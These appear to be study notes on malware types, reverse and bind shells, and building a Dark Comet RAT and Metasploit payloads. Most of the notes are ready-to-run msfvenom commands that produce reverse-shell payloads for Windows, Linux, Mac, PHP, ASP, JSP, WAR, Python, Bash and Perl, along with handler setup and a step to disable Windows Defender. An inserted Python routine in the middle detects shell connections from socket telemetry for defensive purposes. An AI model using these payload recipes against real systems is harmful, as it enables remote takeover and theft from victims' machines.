Jan 08, 2020, 11:24 AM
Malware
What is it?
mal + ware = malicious software
Software designed to infiltrate and damage computers without the user's consent.
The term malware encompasses all the different types of threats to your computer, such as:
viruses, spyware, worms, trojans, etc.

Purpose of Malware !!
Why does malware exist? Why was it created in the first place?
> to do things without the user's permission
> to steal files
> to steal stored passwords
> to hijack a computer
> to hijack core computing functions
> to monitor the activity of the user
> to delete sensitive personal data
> to encrypt sensitive data
> to extort money

Types of Malware:

1. Virus: Vital Information Resources Under Siege
 disrupts the normal functioning of the computer

 They are generally masked as executable files (i.e. attached to .exe files).
 The virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
 Normally, the host program keeps functioning after it is infected by the virus.
 Although viruses cannot replicate themselves across the network on their own, they can replicate and attach themselves to other files locally.
 Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
 a disk, file sharing, or infected email attachments.

2. Worm:
Similar to viruses, but replicates itself across the network as well.
Self-replicating without a host program, and spreads without any human interaction or directives from the malware authors.
Worms are standalone software and do not require a host program or human help to propagate.
A worm enters a computer through a vulnerability in the system and takes advantage of
file-transport or information-transport features on the system, allowing it to travel unaided.

3. Trojan
Malicious software that presents itself as legitimate.
> A Trojan is another type of malware, named after the wooden horse that the Greeks used to infiltrate Troy.
> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems.
> After it is activated, it can carry out any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses).
> Trojans are also known to create backdoors to give malicious users access to the system.
> Unlike viruses and worms, Trojans do not reproduce by infecting other files, nor do they self-replicate.
> Trojans must spread through user interaction, such as opening an email attachment or downloading and running a file from the Internet.

4. Spyware
Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
 or that asserts control over a device without the consumer's knowledge.

5. Ransomware
A kind of malware that is used to extort money from the infected user.
It encrypts all the files on a user's system using a strong encryption algorithm, then demands a ransom in exchange for the decryption key needed to retrieve the user's data.

6. Rootkit
Programs that hide the existence of malware by intercepting (i.e. "hooking") and modifying operating system API calls that supply system information.
Rootkits, or rootkit-enabling functionality, may reside at the user or kernel level in the operating system, or lower, including a hypervisor, master boot record, or the system firmware.
 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
 Rootkits have been seen for Windows, Linux, and Mac OS X systems.

7. Keyloggers
A special kind of spyware.
The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

What are shells?
A shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (such as servers, mobile phones, etc.).

Types of shells
1. Reverse shell
2. Bind shell

Reverse shell
A reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine has a listener port on which it receives the connection, and through that connection code or command execution is achieved.

Figure 1: Reverse TCP shell


Bind shell
A bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection.
The attacker then connects to the victim machine's listener, which then leads to code or command execution on the server.

Figure 2: Bind TCP shell

There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
 One thing which is common between all these shells is that they all communicate over the TCP protocol.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Creating Malware
RAT: Remote Administration Tool
Dark Comet example
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
disable Windows Defender
open Dark Comet
server module (create server) --> full editor
process mutex --> threads
network settings --> enter LHOST and LPORT here --> press add
this will open a socket on the attacker machine to listen for the incoming connection
listen for connection

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Msfvenom

Creating Metasploit Payloads

Often one of the most useful (and, to the beginner, underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module, and it can give you a shell in almost any situation.
 For each of these payloads you can go into msfconsole and select exploit/multi/handler.
 Run 'set payload' for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.).
 Execute and wait for the payload to be run. For the examples below it's pretty self-explanatory, but LHOST should be filled in with your IP address
 (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.


> how to create a malicious file; will not be obfuscating or hiding the file
> will be using reverse TCP
> a reverse TCP connection is noisy and hence will be detected by Windows Defender
> staging and encoding techniques not covered

List payloads
msfvenom -l payloads


msfpayload + msfencode = msfvenom
msf - Metasploit Framework
Kali needed + Windows 10 (Defender disabled)

-- the browser may flag the download -- antivirus may detect it --
msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=<Your IP Address> LPORT=53 -f exe -o <output filename>

-p payload
-f format: can be exe, apk, py, sh, etc.
-o output file name
LHOST local host / listening host [IP address of Kali]
LPORT local port / listening port
--arch the target architecture
--platform to explicitly specify the victim platform

Before executing the payload, start the handler on Kali:
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LPORT <Your Port to Connect On>
set LHOST <Your IP Address>

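As an added example that is not part of these notes, the following Python triage routine shows how a defender tells the two shell patterns apart from socket telemetry: a bind shell appears as an unexpected listener, a reverse shell as an outbound connection from a shell process, and the LPORT=53 choice in the msfvenom command above shows up as TCP to port 53 from something that is not a DNS client. The line format, process names and baselines are assumptions for the example, not any real tool's output.

```python
import re

# Assumed shell process names; a socket owned by one of these marks both shell types above.
SHELL_PROCS = {"cmd.exe", "powershell.exe", "sh", "bash", "nc", "nc.exe"}
# Constructed baseline of approved (process, port) listeners for this host.
BASELINE_LISTENERS = {("svchost.exe", 135), ("sshd", 22)}
# Processes expected to talk TCP to port 53; any other process doing so may hide a reverse shell behind LPORT=53.
DNS_CLIENTS = {"dns.exe", "systemd-resolved", "named"}

# Constructed line layout: <proc> <state> <local ip:port> <remote ip:port|*:*>
LINE_RE = re.compile(
    r"^(?P<proc>\S+)\s+(?P<state>LISTEN|ESTABLISHED)\s+"
    r"(?P<laddr>[\d.]+):(?P<lport>\d+)\s+(?P<raddr>[\d.*]+):(?P<rport>\d+|\*)$"
)

def parse_event(line):
    """Parse one socket line into a dict; return None for anything malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["lport"] = int(ev["lport"])
    ev["rport"] = None if ev["rport"] == "*" else int(ev["rport"])
    return ev

def classify(ev):
    proc = ev["proc"]
    if ev["state"] == "LISTEN":
        # Bind shell pattern: the victim opens a listener and waits for a client.
        if (proc, ev["lport"]) in BASELINE_LISTENERS:
            return "benign"
        return "bind-shell-candidate" if proc in SHELL_PROCS else "unknown-listener"
    # Reverse shell pattern: an outbound, established socket owned by a shell process.
    if proc in SHELL_PROCS:
        return "reverse-shell-candidate" + (" (TCP/53 masquerade)" if ev["rport"] == 53 else "")
    if ev["rport"] == 53 and proc not in DNS_CLIENTS:
        return "suspicious-tcp-53"
    return "benign"

def triage(lines):
    """Map each parseable line to its verdict; malformed lines are dropped."""
    return {ln: classify(ev) for ln in lines if (ev := parse_event(ln)) is not None}

SAMPLE_EVENTS = [  # constructed sample, not real telemetry
    "svchost.exe    LISTEN       0.0.0.0:135      *:*",
    "powershell.exe ESTABLISHED  10.0.0.5:49731   10.0.0.9:53",
    "nc.exe         LISTEN       0.0.0.0:4444     *:*",
    "chrome.exe     ESTABLISHED  10.0.0.5:49732   198.51.100.7:443",
    "garbage line",
]
```

Running triage(SAMPLE_EVENTS) flags the powershell.exe socket to TCP/53 and the nc.exe listener while leaving the baseline svchost.exe listener and the browser's HTTPS connection alone.
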
Other Metasploit payloads

OS-specific binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
(the second line prepends the missing '<?php ' opening tag; pbcopy/pbpaste are the macOS clipboard tools)

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode
For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux-based shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows-based shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac-based shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>